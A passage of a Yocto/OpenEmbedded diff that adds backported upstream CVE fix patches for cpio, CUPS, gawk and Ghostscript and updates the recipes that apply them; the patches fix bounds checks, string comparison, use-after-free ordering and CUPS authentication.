(dynamic_string *s, char const *str); ++ ++#define ds_len(s) ((s)->ds_idx) ++ ++int ds_endswith (dynamic_string *s, int c); ++ +diff --git a/src/util.c b/src/util.c +index 4421b20..6d6bbaa 100644 +--- a/src/util.c ++++ b/src/util.c +@@ -846,11 +846,9 @@ get_next_reel (int tape_des) + FILE *tty_out; /* File for interacting with user. */ + int old_tape_des; + char *next_archive_name; +- dynamic_string new_name; ++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; + char *str_res; + +- ds_init (&new_name, 128); +- + /* Open files for interactive communication. */ + tty_in = fopen (TTY_NAME, "r"); + if (tty_in == NULL) +@@ -925,7 +923,7 @@ get_next_reel (int tape_des) + error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), + old_tape_des, tape_des); + +- free (new_name.ds_string); ++ ds_free (&new_name); + fclose (tty_in); + fclose (tty_out); + } +-- +2.25.1 + + +From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 11 Aug 2021 18:10:38 +0300 +Subject: [PATCH 2/3] Fix previous commit + +* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a +loop. +--- + src/dstring.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 358f356..90c691c 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -64,7 +64,7 @@ void + ds_reset (dynamic_string *s, size_t len) + { + while (len > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + s->ds_idx = len; + } + +@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); + while (len + 1 > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + + +From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 18 Aug 2021 09:41:39 +0300 +Subject: [PATCH 3/3] Fix dynamic string reallocations + +* src/dstring.c (ds_resize): Take additional argument: number of +bytes to leave available after ds_idx. All uses changed. +--- + src/dstring.c | 18 ++++++++---------- + 1 file changed, 8 insertions(+), 10 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 90c691c..0f597cc 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -49,9 +49,9 @@ ds_free (dynamic_string *string) + /* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string) ++ds_resize (dynamic_string *string, size_t len) + { +- if (string->ds_idx == string->ds_size) ++ while (len + string->ds_idx >= string->ds_size) + { + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, + 1); +@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) + void + ds_reset (dynamic_string *s, size_t len) + { +- while (len > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + s->ds_idx = len; + } + +@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + /* Read the input string. */ + while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx++] = next_ch; + } +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = '\0'; + + if (s->ds_idx == 0 && next_ch == EOF) +@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + void + ds_append (dynamic_string *s, int c) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = c; + if (c) + { + s->ds_idx++; +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = 0; + } + } +@@ -115,8 +114,7 @@ void + ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); +- while (len + 1 > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb index 6536257993..5ab567f360 100644 --- a/meta/recipes-extended/cpio/cpio_2.13.bb +++ b/meta/recipes-extended/cpio/cpio_2.13.bb @@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ + file://CVE-2021-38185.patch \ + file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \ + file://0004-Fix-appending-to-archives-bigger-than-2G.patch \ " SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc index 151ef065fe..6cfe314f20 100644 --- a/meta/recipes-extended/cups/cups.inc +++ b/meta/recipes-extended/cups/cups.inc @@ -13,6 +13,11 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t file://0002-don-t-try-to-run-generated-binaries.patch \ file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \ file://0004-cups-fix-multilib-install-file-conflicts.patch\ + file://CVE-2022-26691.patch \ + file://CVE-2023-32324.patch \ + file://CVE-2023-34241.patch \ + file://CVE-2023-32360.patch \ + file://CVE-2023-4504.patch \ " UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases" @@ -41,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi', PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" -PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" +PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd" PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" EXTRA_OECONF = " \ @@ -119,4 +124,4 @@ cups_sysroot_preprocess () { # -25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is # root:root, so this doesn't apply. -CVE_CHECK_WHITELIST += "CVE-2021-25317"
\ No newline at end of file +CVE_CHECK_WHITELIST += "CVE-2021-25317" diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch new file mode 100644 index 0000000000..1fa5a54c70 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch @@ -0,0 +1,33 @@ +From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001 +From: Zdenek Dohnal <zdohnal@redhat.com> +Date: Thu, 26 May 2022 06:27:04 +0200 +Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes + CVE-2022-26691) + +The previous algorithm didn't expect the strings can have a different +length, so one string can be a substring of the other and such substring +was reported as equal to the longer string. + +CVE: CVE-2022-26691 +Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444] +Signed-off-by: Steve Sakoman + +--- +diff --git a/scheduler/cert.c b/scheduler/cert.c +index b268bf1b2..9b65b96c9 100644 +--- a/scheduler/cert.c ++++ b/scheduler/cert.c +@@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */ + b ++; + } + +- return (result); ++ /* ++ * The while loop finishes when *a == '\0' or *b == '\0' ++ * so after the while loop either both *a and *b == '\0', ++ * or one points inside a string, so when we apply logical OR on *a, ++ * *b and result, we get a non-zero return value if the compared strings don't match. ++ */ ++ ++ return (result | *a | *b); + } diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch new file mode 100644 index 0000000000..40b89c9899 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch @@ -0,0 +1,36 @@ +From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001 +From: Zdenek Dohnal <zdohnal@redhat.com> +Date: Thu, 1 Jun 2023 12:04:00 +0200 +Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324) + +CVE: CVE-2023-32324 +Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589] + +(cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e) +Signed-off-by: Sanjay Chitroda <schitrod@cisco.com> +--- + cups/string.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/cups/string.c b/cups/string.c +index 93cdad19..6ef58515 100644 +--- a/cups/string.c ++++ b/cups/string.c +@@ -1,6 +1,7 @@ + /* + * String functions for CUPS. + * ++ * Copyright © 2023 by OpenPrinting. + * Copyright © 2007-2019 by Apple Inc. + * Copyright © 1997-2007 by Easy Software Products. + * +@@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */ + size_t srclen; /* Length of source string */ + + ++ if (size == 0) ++ return (0); ++ + /* + * Figure out how much room is needed... + */ diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch new file mode 100644 index 0000000000..4d39e1e57f --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch @@ -0,0 +1,31 @@ +From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001 +From: Michael R Sweet <michael.r.sweet@gmail.com> +Date: Tue, 6 Dec 2022 09:04:01 -0500 +Subject: [PATCH] Require authentication for CUPS-Get-Document. + +Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913] +CVE: CVE-2023-32360 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + conf/cupsd.conf.in | 8 +++++++- + 1 file changed, 7 insertions(+), 1 deletion(-) + +diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in +index b258849078..a07536f3e4 100644 +--- a/conf/cupsd.conf.in ++++ b/conf/cupsd.conf.in +@@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@ + Order deny,allow + </Limit> + +- <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document> ++ <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job> ++ Require user @OWNER @SYSTEM ++ Order deny,allow ++ </Limit> ++ ++ <Limit CUPS-Get-Document> ++ AuthType Default + Require user @OWNER @SYSTEM + Order deny,allow + </Limit> diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch new file mode 100644 index 0000000000..816efc2946 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch @@ -0,0 +1,65 @@ +From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001 +From: Rose <83477269+AtariDreams@users.noreply.github.com> +Date: Thu, 1 Jun 2023 11:33:39 -0400 +Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection + +httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to. + +We have to log the hostname first. + +Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2] +CVE: CVE-2023-34241 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + scheduler/client.c | 16 +++++++--------- + 1 file changed, 7 insertions(+), 9 deletions(-) + +diff --git a/scheduler/client.c b/scheduler/client.c +index 91e441188c..327473a4d1 100644 +--- a/scheduler/client.c ++++ b/scheduler/client.c +@@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ + /* + * Can't have an unresolved IP address with double-lookups enabled... + */ +- +- httpClose(con->http); +- + cupsdLogClient(con, CUPSD_LOG_WARN, +- "Name lookup failed - connection from %s closed!", ++ "Name lookup failed - closing connection from %s!", + httpGetHostname(con->http, NULL, 0)); + ++ httpClose(con->http); + free(con); + return; + } +@@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ + * with double-lookups enabled... + */ + +- httpClose(con->http); +- + cupsdLogClient(con, CUPSD_LOG_WARN, +- "IP lookup failed - connection from %s closed!", ++ "IP lookup failed - closing connection from %s!", + httpGetHostname(con->http, NULL, 0)); ++ ++ httpClose(con->http); + free(con); + return; + } +@@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */ + + if (!hosts_access(&wrap_req)) + { +- httpClose(con->http); +- + cupsdLogClient(con, CUPSD_LOG_WARN, + "Connection from %s refused by /etc/hosts.allow and " + "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0)); ++ ++ httpClose(con->http); + free(con); + return; + } diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch new file mode 100644 index 0000000000..be0db1fbd4 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch @@ -0,0 +1,40 @@ +From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001 +From: Zdenek Dohnal <zdohnal@redhat.com> +Date: Fri, 1 Sep 2023 16:47:29 +0200 +Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504 + +We didn't check for end of buffer if it looks there is an escaped +character - check for NULL terminator there and if found, return NULL +as return value and in `ptr`, because a lone backslash is not +a valid PostScript character. + +Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31] +CVE: CVE-2023-4504 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + cups/raster-interpret.c | 14 +++++++++++++- + 1 file changed, 13 insertions(+), 1 deletion(-) + +--- a/cups/raster-interpret.c ++++ b/cups/raster-interpret.c +@@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S + + cur ++; + +- if (*cur == 'b') ++ /* ++ * Return NULL if we reached NULL terminator, a lone backslash ++ * is not a valid character in PostScript. ++ */ ++ ++ if (!*cur) ++ { ++ *ptr = NULL; ++ ++ return (NULL); ++ } ++ ++ if (*cur == 'b') + *valptr++ = '\b'; + else if (*cur == 'f') + *valptr++ = '\f'; diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch new file mode 100644 index 0000000000..c6cba058a7 --- /dev/null +++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch @@ -0,0 +1,28 @@ +From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001 +From: "Arnold D. Robbins" <arnold@skeeve.com> +Date: Wed, 3 Aug 2022 13:00:54 +0300 +Subject: [PATCH] Smal bug fix in builtin.c. + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security +Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212] +CVE: CVE-2023-4156 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + ChangeLog | 6 ++++++ + builtin.c | 5 ++++- + 2 files changed, 10 insertions(+), 1 deletion(-) + +--- gawk-5.1.0.orig/builtin.c ++++ gawk-5.1.0/builtin.c +@@ -957,7 +957,10 @@ check_pos: + s1++; + n0--; + } +- if (val >= num_args) { ++ // val could be less than zero if someone provides a field width ++ // so large that it causes integer overflow. Mainly fuzzers do this, ++ // but let's try to be good anyway. ++ if (val < 0 || val >= num_args) { + toofew = true; + break; + } diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch new file mode 100644 index 0000000000..167c0787ee --- /dev/null +++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch @@ -0,0 +1,24 @@ +These tests require an unloaded host as otherwise timing sensitive tests can fail +https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371 + +Upstream-Status: Inappropriate +Signed-off-by: Ross Burton <ross.burton@arm.com> + +--- a/test/Maketests~ ++++ b/test/Maketests +@@ -2069,7 +2069,2 @@ + +-timeout: +- @echo $@ $(ZOS_FAIL) +- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@ +- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ +- + typedregex1: +@@ -2297,7 +2292,2 @@ + @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ +- +-time: +- @echo $@ +- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@ +- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@ + diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb index e79ccfdebf..c71890c19e 100644 --- a/meta/recipes-extended/gawk/gawk_5.0.1.bb +++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb @@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline" PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr" SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \ + file://remove-sensitive-tests.patch \ file://run-ptest \ + file://CVE-2023-4156.patch \ " SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb" @@ -41,13 +43,20 @@ inherit ptest do_install_ptest() { mkdir ${D}${PTEST_PATH}/test ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk - for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \ - do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \ + # The list of tests is all targets in Maketests, apart from the dummy Gt-dummy + TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests) + for i in $TESTS Maketests inclib.awk; do + cp ${S}/test/$i* ${D}${PTEST_PATH}/test done sed -i -e 's|/usr/local/bin|${bindir}|g' \ -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk - sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests + sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests + + # These tests require an unloaded host as otherwise timing sensitive tests can fail + # https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371 + rm -f ${D}${PTEST_PATH}/test/time.* + rm -f ${D}${PTEST_PATH}/test/timeout.* } RDEPENDS_${PN}-ptest += "make" diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch new file mode 100644 index 0000000000..91b9f6df50 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch @@ -0,0 +1,31 @@ +From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Mon, 17 Jul 2023 14:06:37 +0100 +Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from + devices/gdevpcx.c + +Bounds check the buffer, before dereferencing the pointer. + +Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f] +CVE: CVE-2023-38559 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + base/gdevdevn.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/base/gdevdevn.c b/base/gdevdevn.c +index 3b019d6..2888776 100644 +--- a/base/gdevdevn.c ++++ b/base/gdevdevn.c +@@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file + byte data = *from; + + from += step; +- if (data != *from || from == end) { ++ if (from >= end || data != *from) { + if (data >= 0xc0) + gp_fputc(0xc1, file); + } else { +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch new file mode 100644 index 0000000000..ea8bf26f3f --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch @@ -0,0 +1,109 @@ +From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001 +From: Ken Sharp <ken.sharp@artifex.com> +Date: Wed, 20 May 2020 16:02:07 +0100 +Subject: [PATCH] txtwrite - address memory problems + +Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)" +Also bug #702346 and the earlier report #701877. + +The problems occur because its possible for a single character code in +a PDF file to map to more than a single Unicode code point. In the case +of the file for 701877 the character code maps to 'f' and 'i' (it is an +fi ligature). + +The code should deal with this, but we need to ensure we are using the +correct index. In addition, if we do get more Unicode code points than +we expected, we need to set the widths of the 'extra' code points to +zero (we only want to consider the width of the original character). + +This does mean increasing the size of the Widths array to cater for +the possibility of more entries on output than there were on input. + +While working on it I noticed that the Unicode remapping on little- +endian machines was reversing the order of the Unicode values, when +there was more than a single code point returned, so fixed that at +the same time. + +Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874] +CVE: CVE-2020-36773 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + devices/vector/gdevtxtw.c | 26 ++++++++++++++++---------- + 1 file changed, 16 insertions(+), 10 deletions(-) + +diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c +index 87f9355..bddce5a 100644 +--- a/devices/vector/gdevtxtw.c ++++ b/devices/vector/gdevtxtw.c +@@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph, + #else + b = (char *)Buffer; + u = (char *)unicode; +- while (l >= 0) { +- *b++ = *(u + l); +- l--; +- } + ++ for (l=0;l<length;l+=2, u+=2){ ++ *b++ = *(u+1); ++ *b++ = *u; ++ } + #endif + gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer"); + return length / sizeof(short); +@@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte) + &penum->text_state->matrix, &wanted); + pte->returned.total_width.x += wanted.x; + pte->returned.total_width.y += wanted.y; +- penum->Widths[pte->index - 1] = wanted.x; ++ penum->Widths[penum->TextBufferIndex] = wanted.x; + + if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) { + gs_point tpt; +@@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte) + pte->returned.total_width.x += dpt.x; + pte->returned.total_width.y += dpt.y; + +- penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]); +- penum->Widths[pte->index - 1] += dpt.x; ++ penum->Widths[penum->TextBufferIndex] += dpt.x; ++ code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]); ++ /* If a single text code returned multiple Unicode values, then we need to set the ++ * 'extra' code points' widths to 0. ++ */ ++ if (code > 1) ++ memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float)); ++ penum->TextBufferIndex += code; + } + return 0; + } +@@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum) + if (!penum->text_state->Widths) + return gs_note_error(gs_error_VMerror); + memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float)); +- memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float)); ++ memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float)); + + unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory, + penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer"); +@@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum) + if (!unsorted_entry->Widths) + return gs_note_error(gs_error_VMerror); + memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float)); +- memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float)); ++ memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float)); + + unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory, + (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer"); +@@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte) + if (!penum->TextBuffer) + return gs_note_error(gs_error_VMerror); + penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory, +- pte->text.size, sizeof(float), "txtwrite temporary widths array"); ++ pte->text.size * 4, sizeof(float), "txtwrite temporary widths array"); + if (!penum->Widths) + return gs_note_error(gs_error_VMerror); + } +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch new file mode 100644 index 0000000000..033ba77f9a --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch @@ -0,0 +1,121 @@ +From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Thu, 20 Aug 2020 17:19:09 +0100 +Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions + +Firstly, in gx_device_delete_output_file the iodev pointer was being passed +to the delete_method incorrectly (passing a pointer to that pointer). Thus +when we attempted to use that to confirm permission to delete the file, it +crashed. Credit to Ken for finding that. + +Secondly, due to the way pdfwrite works, when running with an output file per +page, it creates the current output file immediately it has completed writing +the previous one. Thus, it has to delete that partial file on exit. + +Previously, the output file was not added to the "control" permission list, +so an attempt to delete it would result in an error. So add the output file +to the "control" as well as "write" list. + +CVE: CVE-2021-3781 + +Upstream-Status: Backport: +https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f + +Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> +--- + base/gsdevice.c | 2 +- + base/gslibctx.c | 20 ++++++++++++++------ + 2 files changed, 15 insertions(+), 7 deletions(-) + +diff --git a/base/gsdevice.c b/base/gsdevice.c +index 913119495..ac78af93f 100644 +--- a/base/gsdevice.c ++++ b/base/gsdevice.c +@@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname) + parsed.len = strlen(parsed.fname); + } + if (parsed.iodev) +- code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname); ++ code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname); + else + code = gs_note_error(gs_error_invalidfileaccess); + +diff --git a/base/gslibctx.c b/base/gslibctx.c +index d726c58b5..ff8fc895e 100644 +--- a/base/gslibctx.c ++++ b/base/gslibctx.c +@@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) + char *fp, f[gp_file_name_sizeof]; + const int pipe = 124; /* ASCII code for '|' */ + const int len = strlen(fname); +- int i; ++ int i, code; + + /* Be sure the string copy will fit */ + if (len >= gp_file_name_sizeof) +@@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) + rewrite_percent_specifiers(f); + for (i = 0; i < len; i++) { + if (f[i] == pipe) { +- int code; +- + fp = &f[i + 1]; + /* Because we potentially have to check file permissions at two levels + for the output file (gx_device_open_output_file and the low level +@@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) + if (code < 0) + return code; + break; ++ code = gs_add_control_path(mem, gs_permit_file_control, f); ++ if (code < 0) ++ return code; + } + if (!IS_WHITESPACE(f[i])) + break; + } ++ code = gs_add_control_path(mem, gs_permit_file_control, fp); ++ if (code < 0) ++ return code; + return gs_add_control_path(mem, gs_permit_file_writing, fp); + } + +@@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) + char *fp, 